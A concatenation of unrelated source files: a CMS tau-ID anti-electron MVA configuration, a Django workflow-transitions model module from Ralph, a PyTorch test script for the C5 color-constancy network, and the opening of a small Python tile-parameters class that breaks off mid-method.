patTauDiscriminationByVTightElectronRejectionMVA62018 = patTauDiscriminationByVLooseElectronRejectionMVA62018.clone(
mapping = cms.VPSet(
cms.PSet(
category = cms.uint32(0),
cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_woGwoGSF_BL_WPeff60'),
variable = cms.string('pt')
),
cms.PSet(
category = cms.uint32(2),
cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_wGwoGSF_BL_WPeff60'),
variable = cms.string('pt')
),
cms.PSet(
category = cms.uint32(5),
cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_woGwGSF_BL_WPeff60'),
variable = cms.string('pt')
),
cms.PSet(
category = cms.uint32(7),
cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_wGwGSF_BL_WPeff60'),
variable = cms.string('pt')
),
cms.PSet(
category = cms.uint32(8),
cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_woGwoGSF_EC_WPeff60'),
variable = cms.string('pt')
),
cms.PSet(
category = cms.uint32(10),
cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_NoEleMatch_wGwoGSF_EC_WPeff60'),
variable = cms.string('pt')
),
cms.PSet(
category = cms.uint32(13),
cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_woGwGSF_EC_WPeff60'),
variable = cms.string('pt')
),
cms.PSet(
category = cms.uint32(15),
cut = cms.string('RecoTauTag_antiElectron'+antiElectronDiscrMVA6_version+'_gbr_wGwGSF_EC_WPeff60'),
variable = cms.string('pt')
)
)
)
### Put all anti-e tau-IDs into a sequence
patTauDiscriminationByElectronRejectionSeq = cms.Sequence(
patTauDiscriminationByElectronRejectionMVA62018Raw
+patTauDiscriminationByVLooseElectronRejectionMVA62018
+patTauDiscriminationByLooseElectronRejectionMVA62018
+patTauDiscriminationByMediumElectronRejectionMVA62018
+patTauDiscriminationByTightElectronRejectionMVA62018
+patTauDiscriminationByVTightElectronRejectionMVA62018
)
### put all new MVA tau-Id stuff to one Sequence
_patTauMVAIDsSeq2017v2 = cms.Sequence(
patTauDiscriminationByIsolationMVArun2v1DBoldDMwLTSeq
+patTauDiscriminationByIsolationMVArun2v1DBnewDMwLTSeq
+patTauDiscriminationByIsolationMVArun2v1DBoldDMdR0p3wLTSeq
+patTauDiscriminationByElectronRejectionSeq
)
patTauMVAIDsSeq = _patTauMVAIDsSeq2017v2.copy()
patTauMVAIDsSeq += patTauDiscriminationByIsolationMVArun2v1DBoldDMwLT2015Seq
_patTauMVAIDsSeqWith2017v1 = _patTauMVAIDsSeq2017v2.copy()
_patTauMVAIDsSeqWith2017v1 += patTauDiscriminationByIsolationMVArun2v1DBoldDMwLT2017v1Seq
from Configuration.Eras.Modifier_run2_nanoAOD_94XMiniAODv1_cff import run2_nanoAOD_94XMiniAODv1
for era in [run2_nanoAOD_94XMiniAODv1,]:
era.toReplaceWith(patTauMVAIDsSeq,_patTauMVAIDsSeqWith2017v1)
# embed new MVA tau-Ids into new tau collection
slimmedTausUpdated = cms.EDProducer("PATTauIDEmbedder",
src = cms.InputTag('slimmedTaus'),
tauIDSources = cms.PSet() # PSet defined below in era dependent way
)
_tauIDSources2017v2 = cms.PSet(
#oldDM
byIsolationMVArun2v1DBoldDMwLTraw2017v2 = cms.InputTag('patTauDiscriminationByIsolationMVArun2v1DBoldDMwLTraw'),
byVVLooseIsolationMVArun2v1DBoldDMwLT2017v2 = cms.InputTag('patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMwLT'),
byVLooseIsolationMVArun2v1DBoldDMwLT2017v2 = cms.InputTag('patTauDiscriminationByVLooseIsolationMVArun2v1DBoldDMwLT'),
byLooseIsolationMVArun2v1DBoldDMwLT2017v2 = cms.InputTag('patTauDiscriminationByLooseIsolationMVArun2v1DBoldDMwLT'),
byMediumIsolationMVArun2v1DBoldDMwLT2017v2 = cms.InputTag('patTauDiscriminationByMediumIsolationMVArun2v1DBoldDMwLT'),
byTightIsolationMVArun2v1DBoldDMwLT2017v2 = cms.InputTag('patTauDiscriminationByTightIsolationMVArun2v1DBoldDMwLT'),
byVTightIsolationMVArun2v1DBoldDMwLT2017v2 = cms.InputTag('patTauDiscriminationByVTightIsolationMVArun2v1DBoldDMwLT'),
byVVTightIsolationMVArun2v1DBoldDMwLT2017v2 = cms.InputTag('patTauDiscriminationByVVTightIsolationMVArun2v1DBoldDMwLT'),
#newDM
byIsolationMVArun2v1DBnewDMwLTraw2017v2 = cms.InputTag('patTauDiscriminationByIsolationMVArun2v1DBnewDMwLTraw'),
byVVLooseIsolationMVArun2v1DBnewDMwLT2017v2 = cms.InputTag('patTauDiscriminationByVVLooseIsolationMVArun2v1DBnewDMwLT'),
byVLooseIsolationMVArun2v1DBnewDMwLT2017v2 = cms.InputTag('patTauDiscriminationByVLooseIsolationMVArun2v1DBnewDMwLT'),
byLooseIsolationMVArun2v1DBnewDMwLT2017v2 = cms.InputTag('patTauDiscriminationByLooseIsolationMVArun2v1DBnewDMwLT'),
byMediumIsolationMVArun2v1DBnewDMwLT2017v2 = cms.InputTag('patTauDiscriminationByMediumIsolationMVArun2v1DBnewDMwLT'),
byTightIsolationMVArun2v1DBnewDMwLT2017v2 = cms.InputTag('patTauDiscriminationByTightIsolationMVArun2v1DBnewDMwLT'),
byVTightIsolationMVArun2v1DBnewDMwLT2017v2 = cms.InputTag('patTauDiscriminationByVTightIsolationMVArun2v1DBnewDMwLT'),
byVVTightIsolationMVArun2v1DBnewDMwLT2017v2 = cms.InputTag('patTauDiscriminationByVVTightIsolationMVArun2v1DBnewDMwLT'),
#oldDMdR0p3
byIsolationMVArun2v1DBdR03oldDMwLTraw2017v2 = cms.InputTag('patTauDiscriminationByIsolationMVArun2v1DBoldDMdR0p3wLTraw'),
byVVLooseIsolationMVArun2v1DBdR03oldDMwLT2017v2 = cms.InputTag('patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMdR0p3wLT'),
byVLooseIsolationMVArun2v1DBdR03oldDMwLT2017v2 = cms.InputTag('patTauDiscriminationByVLooseIsolationMVArun2v1DBoldDMdR0p3wLT'),
byLooseIsolationMVArun2v1DBdR03oldDMwLT2017v2 = cms.InputTag('patTauDiscriminationByLooseIsolationMVArun2v1DBoldDMdR0p3wLT'),
byMediumIsolationMVArun2v1DBdR03oldDMwLT2017v2 = cms.InputTag('patTauDiscriminationByMediumIsolationMVArun2v1DBoldDMdR0p3wLT'),
byTightIsolationMVArun2v1DBdR03oldDMwLT2017v2 = cms.InputTag('patTauDiscriminationByTightIsolationMVArun2v1DBoldDMdR0p3wLT'),
byVTightIsolationMVArun2v1DBdR03oldDMwLT2017v2 = cms.InputTag('patTauDiscriminationByVTightIsolationMVArun2v1DBoldDMdR0p3wLT'),
byVVTightIsolationMVArun2v1DBdR03oldDMwLT2017v2 = cms.InputTag('patTauDiscriminationByVVTightIsolationMVArun2v1DBoldDMdR0p3wLT'),
)
_tauIDSources2017v1 = cms.PSet(
byIsolationMVArun2v1DBoldDMwLTraw2017v1 = cms.InputTag('patTauDiscriminationByIsolationMVArun2v1DBoldDMwLTraw2017v1'),
byVVLooseIsolationMVArun2v1DBoldDMwLT2017v1 = cms.InputTag('patTauDiscriminationByVVLooseIsolationMVArun2v1DBoldDMwLT2017v1'),
byVLooseIsolationMVArun2v1DBoldDMwLT2017v1 = cms.InputTag('patTauDiscriminationByVLooseIsolationMVArun2v1DBoldDMwLT2017v1'),
byLooseIsolationMVArun2v1DBoldDMwLT2017v1 = cms.InputTag('patTauDiscriminationByLooseIsolationMVArun2v1DBoldDMwLT2017v1'),
byMediumIsolationMVArun2v1DBoldDMwLT2017v1 = cms.InputTag('patTauDiscriminationByMediumIsolationMVArun2v1DBoldDMwLT2017v1'),
byTightIsolationMVArun2v1DBoldDMwLT2017v1 = cms.InputTag('patTauDiscriminationByTightIsolationMVArun2v1DBoldDMwLT2017v1'),
byVTightIsolationMVArun2v1DBoldDMwLT2017v1 = cms.InputTag('patTauDiscriminationByVTightIsolationMVArun2v1DBoldDMwLT2017v1'),
byVVTightIsolationMVArun2v1DBoldDMwLT2017v1 = cms.InputTag('patTauDiscriminationByVVTightIsolationMVArun2v1DBoldDMwLT2017v1')
)
_tauIDSourcesWith2017v1 = cms.PSet(
_tauIDSources2017v2.clone(),
_tauIDSources2017v1
)
_tauIDSources2015 = cms.PSet(
byIsolationMVArun2v1DBoldDMwLTraw2015 = cms.InputTag('patTauDiscriminationByIsolationMVArun2v1DBoldDMwLTraw2015'),
byVLooseIsolationMVArun2v1DBoldDMwLT2015 = cms.InputTag('patTauDiscriminationByVLooseIsolationMVArun2v1DBoldDMwLT2015'),
byLooseIsolationMVArun2v1DBoldDMwLT2015 = cms.InputTag('patTauDiscriminationByLooseIsolationMVArun2v1DBoldDMwLT2015'),
byMediumIsolationMVArun2v1DBoldDMwLT2015 = cms.InputTag('patTauDiscriminationByMediumIsolationMVArun2v1DBoldDMwLT2015'),
byTightIsolationMVArun2v1DBoldDMwLT2015 = cms.InputTag('patTauDiscriminationByTightIsolationMVArun2v1DBoldDMwLT2015'),
byVTightIsolationMVArun2v1DBoldDMwLT2015 = cms.InputTag('patTauDiscriminationByVTightIsolationMVArun2v1DBoldDMwLT2015'),
byVVTightIsolationMVArun2v1DBoldDMwLT2015 = cms.InputTag('patTauDiscriminationByVVTightIsolationMVArun2v1DBoldDMwLT2015')
)
_tauIDSourcesWith2015 = cms.PSet(
_tauIDSources2017v2.clone(),
_tauIDSources2015
)
slimmedTausUpdated.tauIDSources=_tauIDSourcesWith2015
for era in [run2_nanoAOD_94XMiniAODv1,]:
era.toModify(slimmedTausUpdated,
tauIDSources = _tauIDSourcesWith2017v1
)
_antiETauIDSources = cms.PSet(
againstElectronMVA6Raw2018 = cms.InputTag("patTauDiscriminationByElectronRejectionMVA62018Raw"),
againstElectronMVA6category2018 = cms.InputTag("patTauDiscriminationByElectronRejectionMVA62018Raw","category"),
againstElectronVLooseMVA62018 = cms.InputTag("patTauDiscriminationByVLooseElectronRejectionMVA62018"),
againstElectronLooseMVA62018 = cms.InputTag("patTauDiscriminationByLooseElectronRejectionMVA62018"),
againstElectronMediumMVA62018 = cms.InputTag("patTauDiscriminationByMediumElectronRejectionMVA62018"),
againstElectronTightMVA62018 = cms.InputTag("patTauDiscriminationByTightElectronRejectionMVA62018"),
againstElectronVTightMVA62018 = cms.InputTag("patTauDiscriminationByVTightElectronRejectionMVA62018")
)
_tauIDSourcesWithAntiE = cms.PSet(
slimmedTausUpdated.tauIDSources.clone(),
_antiETauIDSources
)
slimmedTausUpdated.tauIDSources=_tauIDSourcesWithAntiE
patTauMVAIDsSeq += slimmedTausUpdated
|
<filename>src/ralph/lib/transitions/models.py
# -*- coding: utf-8 -*-
import inspect
import logging
import operator
from collections import defaultdict
import reversion
from django import forms
from django.conf import settings
from django.contrib.auth.models import Permission
from django.contrib.contenttypes.models import ContentType
from django.core.exceptions import FieldDoesNotExist
from django.db import models, transaction
from django.db.models.base import ModelBase
from django.db.models.signals import (
post_delete,
post_migrate,
post_save,
pre_save
)
from django.dispatch import receiver
from django.utils.functional import curry
from django.utils.text import slugify
from django.utils.translation import ugettext_lazy as _
from django_extensions.db.fields.json import JSONField
from ralph.admin.helpers import (
get_content_type_for_model,
get_field_by_relation_path
)
from ralph.attachments.models import Attachment
from ralph.lib.mixins.models import TimeStampMixin
from ralph.lib.transitions.conf import TRANSITION_ATTR_TAG
from ralph.lib.transitions.exceptions import (
TransitionModelNotFoundError,
TransitionNotAllowedError
)
from ralph.lib.transitions.fields import TransitionField
_transitions_fields = {}
logger = logging.getLogger(__name__)
TRANSITION_ORIGINAL_STATUS = (0, 'Keep orginal status')
class CycleError(Exception):
pass
def _generate_transition_history(
instance, transition, user, attachment, history_kwargs, action_names, field
):
"""Return history object (without saving it) based on parameters."""
field_value = getattr(instance, field, None)
try:
target = instance._meta.get_field(
field
).choices.from_id(int(transition.target)).name
except ValueError:
target = None
try:
source = instance._meta.get_field(
field
).choices.from_id(int(field_value)).name
except ValueError:
source = None
return TransitionsHistory(
transition_name=transition.name,
content_type=get_content_type_for_model(instance._meta.model),
object_id=instance.pk,
logged_user=user,
attachment=attachment,
kwargs=history_kwargs,
actions=action_names,
source=source,
target=target
)
def _get_history_dict(data, instance, runned_funcs):
history = {}
for func in runned_funcs:
defaults = {
key.split('__')[1]: value
for key, value in data.items()
if key.startswith(func.__name__)
}
for k, v in defaults.items():
if func.form_fields[k].get('exclude_from_history', False):
continue
value = v
try:
field = get_field_by_relation_path(instance, k)
if isinstance(field, models.ForeignKey):
value = str(field.rel.to.objects.get(pk=v))
field_name = field.verbose_name
elif isinstance(field, models.ManyToOneRel):
value = ', '.join(map(str, v))
field_name = v.model._meta.verbose_name_plural
else:
field_name = field.verbose_name
except FieldDoesNotExist:
field = func.form_fields[k]['field']
if isinstance(field, forms.ChoiceField):
value = dict(field.choices).get(int(v))
field_name = field.label
history[str(field_name)] = value
return history
def _check_type_instances(instances):
"""Function check type of instances.
Conditions:
- transition can run only objects with the same type.
"""
if not all(
map(lambda x: isinstance(instances[0], x.__class__), instances)
):
raise NotImplementedError()
def _check_and_get_transition(obj, transition, field):
"""Check and get transition from parameters.
Args:
obj: The object from database.
transition: The transition object or a string.
field: The field as a string.
Returns:
The transition object.
Raises:
TransitionModelNotFoundError: An error ocurred when transition is
not found for object's class.
"""
if obj.__class__ not in _transitions_fields.keys():
raise TransitionModelNotFoundError(
'Model {} not found in registry'.format(obj.__class__)
)
if isinstance(transition, str):
transition_model = obj.transition_models[field]
transition = Transition.objects.get(
name=transition,
model=transition_model,
)
return transition
def _check_instances_for_transition(instances, transition):
"""Check in respect of the instances source status.
Args:
instances: Objects to checks.
transition: The transition object or a string.
Raises:
TransitionNotAllowedError: An error ocurred when one or more of
instances not allowed transition.
"""
errors = defaultdict(list)
for instance in instances:
if instance.status not in [int(s) for s in transition.source]:
errors[instance].append(_('wrong source status'))
for func in transition.get_pure_actions(instances[0]):
error = func.precondition(instances)
if error:
for instance, error_details in error.items():
errors[instance].append(error_details)
if errors:
raise TransitionNotAllowedError(
'Transition {} is not allowed for objects'.format(transition.name),
errors
)
def _check_action_with_instances(instances, transition):
for func in transition.get_pure_actions(instances[0]):
validation_func = getattr(func, 'validation', lambda x: True)
validation_func(instances)
def _check_user_perm_for_transition(user, transition):
if not user:
return True
return user.has_perm('{}.{}'.format(
transition.permission_info['content_type'].app_label,
transition.permission_info['codename']
))
def _create_graph_from_actions(actions, instance):
graph = {}
actions_set = set()
for action in actions:
actions_set.add(action.name)
func = getattr(instance, action.name)
graph.setdefault(action.name, [])
for requirement in getattr(func, 'run_after', []):
graph.setdefault(requirement, []).append(action.name)
return {k: v for (k, v) in graph.items() if k in actions_set}
def _sort_graph_topologically(graph):
# calculate input degree (number of nodes pointing to particular node)
indeg = {k: 0 for k in graph}
for node, edges in graph.items():
for edge in edges:
indeg[edge] += 1
# sort graph topologically
# return nodes which input degree is 0
no_requirements = set([a for a in indeg if indeg.get(a, 0) == 0])
while no_requirements:
action_name = no_requirements.pop()
# for each node to which this one is pointing - decrease input degree
for dependency in graph[action_name]:
indeg[dependency] -= 1
# add to set of nodes ready to be returned (without nodes pointing
# to it)
if indeg[dependency] == 0:
no_requirements.add(dependency)
yield action_name
if any(indeg.values()):
raise CycleError("Cycle detected during topological sort")
def _order_actions_by_requirements(actions, instance):
graph = _create_graph_from_actions(actions, instance)
actions_by_name = {a.name: a for a in actions}
for action in _sort_graph_topologically(graph):
yield actions_by_name[action]
@transaction.atomic
def run_field_transition(
instances, transition_obj_or_name, field, data={}, **kwargs
):
"""
Execute all actions assigned to the selected transition.
"""
first_instance = instances[0]
_check_type_instances(instances)
transition = _check_and_get_transition(
first_instance, transition_obj_or_name, field
)
_check_instances_for_transition(instances, transition)
_check_action_with_instances(instances, transition)
attachment = None
action_names = []
runned_funcs = []
func_history_kwargs = defaultdict(dict)
disable_save_object = False
for action in _order_actions_by_requirements(
transition.actions.all(), first_instance
):
logger.info('Performing action {} in transition {}'.format(
action, transition
))
func = getattr(first_instance, action.name)
if func.disable_save_object:
disable_save_object = True
defaults = data.copy()
defaults.update(kwargs)
defaults.update({'history_kwargs': func_history_kwargs})
defaults.update({
key.split('__')[1]: value
for key, value in data.items()
if key.startswith(action.name)
})
try:
result = func(instances=instances, **defaults)
except Exception as e:
logger.exception(e)
return False, None
runned_funcs.append(func)
action_names.append(str(getattr(
func,
'verbose_name',
func.__name__.replace('_', ' ').capitalize()
)))
if isinstance(result, Attachment):
attachment = result
history_list = []
for instance in instances:
if not int(transition.target) == TRANSITION_ORIGINAL_STATUS[0]:
setattr(instance, field, int(transition.target))
history_kwargs = _get_history_dict(data, instance, runned_funcs)
history_kwargs.update(func_history_kwargs[instance.pk])
history_list.append(_generate_transition_history(
instance=instance,
transition=transition,
user=kwargs['request'].user,
attachment=attachment,
history_kwargs=history_kwargs,
action_names=action_names,
field=field
))
if not disable_save_object:
with transaction.atomic(), reversion.create_revision():
instance.save()
reversion.set_comment('Transition {}'.format(transition))
reversion.set_user(kwargs['request'].user)
if history_list:
TransitionsHistory.objects.bulk_create(history_list)
return True, attachment
def get_available_transitions_for_field(instance, field, user=None):
"""
Returns list of all available transitions for field.
"""
if not hasattr(instance, 'transition_models'):
return []
transitions = Transition.objects.filter(
model=instance.transition_models[field],
)
result = []
for transition in transitions:
# check if source field value is in values available for this transition
# and if user has rights to execute this transition
if (
getattr(instance, field) in [int(s) for s in transition.source] and
_check_user_perm_for_transition(user, transition)
):
result.append(transition)
return result
class TransitionWorkflowBase(ModelBase):
"""
Added extra methods to new class based on registred transition
fields (eg. status and etc).
"""
def __new__(cls, name, bases, attrs):
fields = [
key for key, value in attrs.items()
if issubclass(type(value), TransitionField)
]
new_class = super().__new__(cls, name, bases, attrs)
if fields:
_transitions_fields[new_class] = fields
for field in fields:
new_class.add_to_class(
'get_available_transitions_for_{}'.format(field),
curry(get_available_transitions_for_field, field=field)
)
return new_class
class TransitionModel(models.Model):
content_type = models.ForeignKey(ContentType)
field_name = models.CharField(max_length=50)
class Meta:
unique_together = ('content_type', 'field_name')
app_label = 'transitions'
def __str__(self):
return '{} {}'.format(self.content_type, self.field_name)
class Transition(models.Model):
name = models.CharField(max_length=50)
model = models.ForeignKey(TransitionModel)
source = JSONField()
target = models.CharField(max_length=50)
actions = models.ManyToManyField('Action')
class Meta:
unique_together = ('name', 'model')
app_label = 'transitions'
def __str__(self):
return self.name
@property
def permission_info(self):
return {
'name': 'Can run {} transition'.format(self.name.lower()),
'content_type': self.model.content_type,
'codename': 'can_run_{}_transition'.format(slugify(self.name))
}
@classmethod
def transitions_for_model(cls, model, user=None):
content_type = ContentType.objects.get_for_model(model)
transitions = cls.objects.filter(model__content_type=content_type)
return [
transition for transition in transitions
if _check_user_perm_for_transition(user, transition)
]
def get_pure_actions(self, instance):
return [
getattr(instance, action.name) for action in self.actions.all()
]
def has_form(self, instance):
for action in self.get_pure_actions(instance):
if getattr(action, 'form_fields', None):
return True
return False
class Action(models.Model):
content_type = models.ManyToManyField(ContentType)
name = models.CharField(max_length=50)
class Meta:
app_label = 'transitions'
ordering = ['name']
def __str__(self):
return self.name
@classmethod
def actions_for_model(cls, model):
content_type = ContentType.objects.get_for_model(model)
return cls.objects.filter(content_type=content_type)
class TransitionsHistory(TimeStampMixin):
content_type = models.ForeignKey(ContentType)
transition_name = models.CharField(max_length=255)
source = models.CharField(max_length=50, blank=True, null=True)
target = models.CharField(max_length=50, blank=True, null=True)
object_id = models.IntegerField(db_index=True)
logged_user = models.ForeignKey(settings.AUTH_USER_MODEL)
attachment = models.ForeignKey(Attachment, blank=True, null=True)
kwargs = JSONField()
actions = JSONField()
class Meta:
app_label = 'transitions'
def __str__(self):
return str(self.transition_name)
def update_models_attrs():
"""
Add to class new attribute `transition_models` which is dict with all
transitionable models (key) and fields (value as list).
"""
for model, field_names in _transitions_fields.items():
ContentType.objects.get_for_model(model)
content_type = ContentType.objects.get_for_model(model)
transition_models = {}
for field_name in field_names:
transition_model, _ = TransitionModel.objects.get_or_create(
content_type=content_type,
field_name=field_name
)
transition_models[field_name] = transition_model
setattr(model, 'transition_models', transition_models)
def update_transitions_affter_migrate(**kwargs):
"""
Create or update transition for models which detetected
TRANSITION_ATTR_TAG in any field in model.
"""
sender_models = list(kwargs['sender'].get_models())
for model, field_names in filter(
lambda x: operator.itemgetter(0)(x) in sender_models,
_transitions_fields.items()
):
content_type = ContentType.objects.get_for_model(model)
for field_name in field_names:
transition_model, _ = TransitionModel.objects.get_or_create(
content_type=content_type,
field_name=field_name
)
detected_actions = inspect.getmembers(
model, predicate=lambda x: hasattr(x, TRANSITION_ATTR_TAG)
)
for name, _ in detected_actions:
action, _ = Action.objects.get_or_create(
name=name,
)
action.content_type.add(content_type)
post_migrate.connect(update_transitions_affter_migrate)
@receiver(post_delete, sender=Transition)
def post_delete_transition(sender, instance, **kwargs):
Permission.objects.filter(**instance.permission_info).delete()
@receiver(pre_save, sender=Transition)
def post_save_transition(sender, instance, **kwargs):
if instance.pk:
try:
old = sender.objects.get(pk=instance.pk)
except sender.DoesNotExist: # raised ex. during fixtures loading
pass
else:
setattr(instance, '_old_permission_info', old.permission_info)
@receiver(post_save, sender=Transition)
def create_permission(sender, instance, created, **kwargs):
if created:
Permission.objects.create(**instance.permission_info)
else:
old_info = getattr(instance, '_old_permission_info', None)
if not old_info:
return
perm, created = Permission.objects.get_or_create(**old_info)
if not created:
Permission.objects.filter(pk=perm.pk).update(
**instance.permission_info
)
|
<gh_stars>0
"""
##### Copyright 2021 Google LLC. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
import argparse
import logging
import os
import numpy as np
import torch
from src import c5
from scipy.io import savemat
from src import dataset
from torch.utils.data import DataLoader
from src import ops
from torchvision.utils import save_image
from torchvision.utils import make_grid
def test_net(net, device, dir_img, batch_size=64, input_size=64, data_num=7,
g=False, model_name='c5_model', load_hist=False,
white_balance=False, multiple_test=False, files=None,
cross_validation=False, save_output=True):
""" Tests C5 network.
Args:
net: network object (c5.network).
device: use 'cpu' or 'cuda' (string).
dir_img: full path of testing set directory (string).
batch_size: mini-batch size; default value is 64.
input_size: Number of bins in histogram; default is 64.
data_num: number of input histograms to C5 network (m in the paper);
default value is 7.
g: boolean flag to learn the gain multiplier map G; default value
is True.
model_name: Name of the trained model; default is 'c5_model'.
load_hist: boolean flag to load histograms from beginning (if exists in the
image directory); default value is True.
white_balance: boolean to perform a diagonal correction using the estimated
illuminant color and save output images in harddisk. The saved images
will be located in white_balanced_images/model_name/.; default is False.
multiple_test: boolean flag to perform ten tests as described in the
paper; default is False.
files: a list to override loading files located in dir_img; default is
None.
cross_validation: boolean flag to use three-fold cross-validation on
files located in the 'dir_img' directory; default value is False.
save_output: boolean flag to save the results in results/model_name/.;
default is True.
"""
if files is None:
files = dataset.Data.load_files(dir_img)
batch_size = min(batch_size, len(files))
test = dataset.Data(files, input_size=input_size, mode='testing',
data_num=data_num,
load_hist=load_hist)
test_loader = DataLoader(test, batch_size=batch_size, shuffle=False,
num_workers=8, pin_memory=True)
logging.info(f'''Starting testing:
Model Name: {model_name}
Batch size: {batch_size}
Number of input: {data_num}
Learn G multiplier: {g}
Input size: {input_size} x {input_size}
Testing data: {len(files)}
White balance: {white_balance}
Multiple tests: {multiple_test}
Cross validation: {cross_validation}
Save output: {save_output}
Device: {device.type}
''')
if multiple_test:
number_of_tests = 10
else:
number_of_tests = 1
if white_balance:
save_filter_dir_wb = os.path.join('white_balanced_images', model_name)
if not os.path.exists(save_filter_dir_wb):
if not os.path.exists('white_balanced_images'):
os.mkdir('white_balanced_images')
os.mkdir(save_filter_dir_wb)
logging.info(f'Created visualization directory {save_filter_dir_wb}')
with torch.no_grad():
for test_i in range(number_of_tests):
results = np.zeros((len(test), 3)) # to store estimated illuminant values
gt = np.zeros((len(test), 3)) # to store ground-truth illuminant colors
index = 0
for batch in test_loader:
model_histogram = batch['model_input_histograms']
model_histogram = model_histogram.to(device=device,
dtype=torch.float32)
if white_balance:
image = batch['image_rgb']
image = image.to(device=device, dtype=torch.float32)
file_names = batch['file_name']
histogram = batch['histogram']
histogram = histogram.to(device=device, dtype=torch.float32)
gt_ill = batch['gt_ill']
gt_ill = gt_ill.to(device=device, dtype=torch.float32)
predicted_ill, _, _, _, _ = net(histogram, model_in_N=model_histogram)
if white_balance and test_i == 0:
bs = image.shape[0]
for c in range(3):
correction_ratio = predicted_ill[:, 1] / predicted_ill[:, c]
correction_ratio = correction_ratio.view(bs, 1, 1)
image[:, c, :, :] = image[:, c, :, :] * correction_ratio
image = 1 * torch.pow(image, 1.0 / 2.19921875)
for b in range(bs):
save_image(make_grid(image[b, :, :, :], nrow=1), os.path.join(
save_filter_dir_wb, file_names[b]))
L = len(predicted_ill)
results[index:index + L, :] = predicted_ill.cpu().numpy()
gt[index:index + L, :] = gt_ill.cpu().numpy()
index = index + L
if save_output:
save_dir = os.path.join('results', model_name)
if not os.path.exists(save_dir):
if not os.path.exists('results'):
os.mkdir('results')
os.mkdir(save_dir)
logging.info(f'Created results directory {save_dir}')
if multiple_test:
savemat(os.path.join(save_dir, f'gt_{test_i + 1}.mat'), {'gt': gt})
savemat(os.path.join(save_dir, f'results_{test_i + 1}.mat'),
{'predicted': results})
else:
savemat(os.path.join(save_dir, 'gt.mat'), {'gt': gt})
savemat(os.path.join(save_dir, 'results.mat'), {'predicted': results})
logging.info('End of testing')
def get_args():
parser = argparse.ArgumentParser(description='Test C5.')
parser.add_argument('-b', '--batch-size', metavar='B', type=int,
nargs='?', default=64,
help='Batch size', dest='batchsize')
parser.add_argument('-s', '--input-size', dest='input_size', type=int,
default=64, help='Size of input (hist and image)')
parser.add_argument('-ntrd', '--testing-dir-in', dest='in_tedir',
default='/testing_set/',
help='Input testing image directory')
parser.add_argument('-lh', '--load-hist', dest='load_hist',
type=bool, default=True,
help='Load histogram if exists')
parser.add_argument('-dn', '--data-num', dest='data_num', type=int, default=7,
help='Number of input data for calibration')
parser.add_argument('-lg', '--g-multiplier', type=bool, default=False,
help='Have a G multiplier', dest='g_multiplier')
parser.add_argument('-mt', '--multiple_test', type=bool, default=True,
help='do 10 tests and save the results',
dest='multiple_test')
parser.add_argument('-wb', '--white-balance', type=bool,
default=False, help='save white-balanced image',
dest='white_balance')
parser.add_argument('-cv', '--cross-validation', dest='cross_validation',
type=bool, default=False,
help='Use three cross validation. If true, we assume '
'that there are three pre-trained models saved '
'with a postfix of the fold number. The testing '
'image filenames should be listed in .npy files '
'located in "folds" directory with the same name of '
'the dataset, which should be the same as the '
'folder name in --testing-dir-in')
parser.add_argument('-n', '--model-name', dest='model_name',
default='c5_model')
parser.add_argument('-g', '--gpu', dest='gpu', default=0, type=int)
return parser.parse_args()
if __name__ == '__main__':
logging.basicConfig(level=logging.INFO, format='%(levelname)s: %(message)s')
logging.info('Testing C5')
args = get_args()
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
if device.type != 'cpu':
torch.cuda.set_device(args.gpu)
logging.info(f'Using device {device}')
net = c5.network(input_size=args.input_size, learn_g=args.g_multiplier,
data_num=args.data_num, device=device)
if args.cross_validation:
dataset_name = os.path.basename(args.in_tedir)
for fold in range(3):
model_path = os.path.join('models', args.model_name +
f'_fold_{fold + 1}.pth')
net.load_state_dict(torch.load(model_path, map_location=device))
logging.info(f'Model loaded from {model_path}')
net.to(device=device)
net.eval()
testing_files = np.load(f'folds/{dataset_name}_fold_{fold + 1}.npy')
files = [os.path.join(args.in_tedir, os.path.basename(file)) for file in
testing_files]
test_net(net=net, device=device, dir_img=args.in_tedir,
cross_validation=args.cross_validation,
g=args.g_multiplier,
multiple_test=args.multiple_test,
white_balance=args.white_balance,
files=files, data_num=args.data_num,
batch_size=args.batchsize,
model_name=f'{args.model_name}_fold_{fold + 1}',
input_size=args.input_size,
load_hist=args.load_hist)
else:
model_path = os.path.join('models', args.model_name + '.pth')
net.load_state_dict(torch.load(model_path, map_location=device))
logging.info(f'Model loaded from {model_path}')
net.to(device=device)
net.eval()
test_net(net=net, device=device,
data_num=args.data_num, dir_img=args.in_tedir,
cross_validation=args.cross_validation,
g=args.g_multiplier,
multiple_test=args.multiple_test,
white_balance=args.white_balance,
batch_size=args.batchsize, model_name=args.model_name,
input_size=args.input_size,
load_hist=args.load_hist)
|
<filename>ddt_python/ddt_tile.py
class ddt_tile():
def __init__(self,tileparameters_I = [],specificparameters_I = []):
if tileparameters_I:self.tileparameters = tileparameters_I;
else: self.tileparameters = [];
if specificparameters_I:self.specificparameters = specificparameters_I;
else: self.specificparameters = [];
def clear_objects(self):
'''remove data'''
self.tileparameters = [];
self.specificparameters = [];
def add_objects(self,tileparameters_I,specificparameters_I):
'''add data'''
if tileparameters_I:self.tileparameters = tileparameters_I;
else: self.tileparameters = [];
if specificparameters_I:self.specificparameters = specificparameters_I;
else: self.specificparameters = [];
def get_parameters(self):
'''Return the parameters object'''
tileparameters_O = {};
specificparameters_O = {};
parameters_O = {};
if self.tileparameters:
tileparameters_O = self.tileparameters;
if self.specificparameters:
specificparameters_O = self.specificparameters;
